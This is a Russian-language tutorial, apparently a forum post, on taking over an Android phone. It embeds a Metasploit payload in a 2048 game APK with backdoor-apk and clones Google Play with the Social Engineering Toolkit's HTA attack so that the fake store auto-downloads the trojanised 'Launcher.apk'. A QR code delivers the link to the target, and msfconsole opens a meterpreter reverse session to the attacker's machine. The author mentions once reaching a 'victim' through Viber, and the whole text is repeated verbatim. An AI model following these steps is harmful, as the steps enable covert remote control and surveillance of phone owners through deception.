Всем привет! В этой теме я хочу показать еще один способ взлома Android – устройства, на мой взгляд, не сложный, но действенный. Использовать будем QR-код, HTA – сервер и естественно Kali Linux.
Для начала нам потребуется софт, для того, чтобы поместить полезную нагрузку в APK – файл. Мы будем использовать Backdoor-apk, скачаем его с Github командой:
> git clone https://github.com/dana-at-cp/backdoor-apk.git
Затем установим все необходимые библиотеки.
> apt-get install lib32stdc++6 lib32ncurses5 lib32z1
Теперь нам понадобится приложение, в которое мы будем «вшивать» полезную нагрузку, для этого перейдем на сайт apk4fun.com и выберем понравившееся. Сразу оговорюсь, что я перепробовал порядка ста приложений, но большинство из них не компилировалось, при попытке записать нагрузку в него. Еще какая-то часть работала с ошибками. Так же я сталкивался с проблемой, когда сессия отваливались по прошествии 30 – 50 сек после открытия. А именно, когда телефон уходил в ждущий режим и гас экран.
Был интересный момент c Viber, пару раз мне удавалось «вызвать» сессию тогда когда мне было нужно, просто написав сообщение жертве. Но потом эксперимент провалился, приложение перестало работать от слова совсем.
Итак, после нескольких часов тестов я остановился на игре 2048. Как это ни забавно, но именно она работала стабильнее всего, и сессия meterpreter работала корректно.
Качаем именно эту версию, так как другие я просто не пробовал:
Сохраняем файл:
Затем скопируем файл в папку с установленным Backdoor-apk.
Теперь, выполняя по очереди следующие команды, создадим файл с полезной нагрузкой:
> cd backdoor-apk
> cd backdoor-apk
> ./backdoor-apk.sh com.digiplex.game-2.7.2.apk (я сократил ему имя)
Выбираем параметры соответствующие нашим требованиям, я провожу эксперимент в пределах своей локальной сети.
Этот процесс сгенерирует готовый файл в директорию, в моем случае, /root/backdoor-apk/backdoor-apk/original/dist
На этом пока остановимся.
Пришло время запустить SET - Social Engineering Toolkit – набор инструментов для социальной инженерии. Вектор выбранной атаки – это клонирование сайта Google Play и скачивания игры 2048 именно с нашего, клонированного сайта. Дальнейшие действия не должны выходить за рамки приведенной ниже инструкции. Запускаем SET:
> setoolkit
Выбираем:
Выберем Website Attack Vectors.
Нас интересует HTA – Attack Method.
Следующий выбранный пункт – это ввод адреса сайта, который мы склонируем. Базироваться он будет нашей локальной сети, и единственная его цель, это доставить игру с полезной нагрузкой на смартфон цели. Так как по легенде это игра, то клонируем Google Market.
> https://play.google.com/store
Опции, которые будет запрашивать SET вы можете вводить такие же, как и при создании .apk файла. В моем случае 192.168.0.101 и порт 4444. Позже мы все изменим. Терминал с запущенным SET не закрываем.
Итак, Apache работает, ложный сайт склонирован. Если зайдем на адрес 192.168.0.101 с любого компьютера в нашей сети, то в случае успеха, попадем на фэйковый Google Play.
Теперь необходимо инициировать скачивание файла с нашей игрой сразу после перехода на сайт, для этого выполним следующие действия:
· Копируем файл с полезной нагрузкой в директорию /var/www/html (На Kali Linux машине)
· В файле index.html меняем указанную строку. Впишем туда название файла с игрой, но предварительно переименуем ее в Launcher.apk (Ctrl+F поиск по файлу)
Теперь, зайдя на страницу по адресу 192.168.0.101, мы не просто попадаем на ложный Google Play, но и скачиваем автоматически нашу игру 2048 переименованную в Launcher.apk.
Теперь мы оптимизируем процесс установки нашего приложения на целевое устройство.
Для начала установим расширение The QR Code Extension в наш браузер. Я использую Google Chrome.
На целевом устройстве должно присутствовать приложение для считывания QR – кодов, например, QR – Code Reader:
Перейдем на наш фейковый сайт Google Play и сгенерируем QR – код ссылку на него.
Просканировав QR – код с нашего целевого устройства мы скачиваем наш файл с полезной нагрузкой.
Установим игру.
Для получения сессии meterpreter, заранее запустим на исполнение файл backdoor-apk.rc командой:
> msfconsole –r backdoor-apk.rc
И затем, запустим игру.
В консоли получаем активную сессию meterpreter.
На этом все, спасибо за внимание.
Для начала нам потребуется софт, для того, чтобы поместить полезную нагрузку в APK – файл. Мы будем использовать Backdoor-apk, скачаем его с Github командой:
> git clone https://github.com/dana-at-cp/backdoor-apk.git
Затем установим все необходимые библиотеки.
> apt-get install lib32stdc++6 lib32ncurses5 lib32z1
Теперь нам понадобится приложение, в которое мы будем «вшивать» полезную нагрузку, для этого перейдем на сайт apk4fun.com и выберем понравившееся. Сразу оговорюсь, что я перепробовал порядка ста приложений, но большинство из них не компилировалось, при попытке записать нагрузку в него. Еще какая-то часть работала с ошибками. Так же я сталкивался с проблемой, когда сессия отваливались по прошествии 30 – 50 сек после открытия. А именно, когда телефон уходил в ждущий режим и гас экран.
Был интересный момент c Viber, пару раз мне удавалось «вызвать» сессию тогда когда мне было нужно, просто написав сообщение жертве. Но потом эксперимент провалился, приложение перестало работать от слова совсем.
Итак, после нескольких часов тестов я остановился на игре 2048. Как это ни забавно, но именно она работала стабильнее всего, и сессия meterpreter работала корректно.
Качаем именно эту версию, так как другие я просто не пробовал:
Сохраняем файл:
Затем скопируем файл в папку с установленным Backdoor-apk.
Теперь, выполняя по очереди следующие команды, создадим файл с полезной нагрузкой:
> cd backdoor-apk
> cd backdoor-apk
> ./backdoor-apk.sh com.digiplex.game-2.7.2.apk (я сократил ему имя)
Выбираем параметры соответствующие нашим требованиям, я провожу эксперимент в пределах своей локальной сети.
Этот процесс сгенерирует готовый файл в директорию, в моем случае, /root/backdoor-apk/backdoor-apk/original/dist
На этом пока остановимся.
Пришло время запустить SET - Social Engineering Toolkit – набор инструментов для социальной инженерии. Вектор выбранной атаки – это клонирование сайта Google Play и скачивания игры 2048 именно с нашего, клонированного сайта. Дальнейшие действия не должны выходить за рамки приведенной ниже инструкции. Запускаем SET:
> setoolkit
Выбираем:
Выберем Website Attack Vectors.
Нас интересует HTA – Attack Method.
Следующий выбранный пункт – это ввод адреса сайта, который мы склонируем. Базироваться он будет нашей локальной сети, и единственная его цель, это доставить игру с полезной нагрузкой на смартфон цели. Так как по легенде это игра, то клонируем Google Market.
> https://play.google.com/store
Опции, которые будет запрашивать SET вы можете вводить такие же, как и при создании .apk файла. В моем случае 192.168.0.101 и порт 4444. Позже мы все изменим. Терминал с запущенным SET не закрываем.
Итак, Apache работает, ложный сайт склонирован. Если зайдем на адрес 192.168.0.101 с любого компьютера в нашей сети, то в случае успеха, попадем на фэйковый Google Play.
Теперь необходимо инициировать скачивание файла с нашей игрой сразу после перехода на сайт, для этого выполним следующие действия:
· Копируем файл с полезной нагрузкой в директорию /var/www/html (На Kali Linux машине)
· В файле index.html меняем указанную строку. Впишем туда название файла с игрой, но предварительно переименуем ее в Launcher.apk (Ctrl+F поиск по файлу)
Теперь, зайдя на страницу по адресу 192.168.0.101, мы не просто попадаем на ложный Google Play, но и скачиваем автоматически нашу игру 2048 переименованную в Launcher.apk.
Теперь мы оптимизируем процесс установки нашего приложения на целевое устройство.
Для начала установим расширение The QR Code Extension в наш браузер. Я использую Google Chrome.
На целевом устройстве должно присутствовать приложение для считывания QR – кодов, например, QR – Code Reader:
Перейдем на наш фейковый сайт Google Play и сгенерируем QR – код ссылку на него.
Просканировав QR – код с нашего целевого устройства мы скачиваем наш файл с полезной нагрузкой.
Установим игру.
Для получения сессии meterpreter, заранее запустим на исполнение файл backdoor-apk.rc командой:
> msfconsole –r backdoor-apk.rc
И затем, запустим игру.
В консоли получаем активную сессию meterpreter.
На этом все, спасибо за внимание.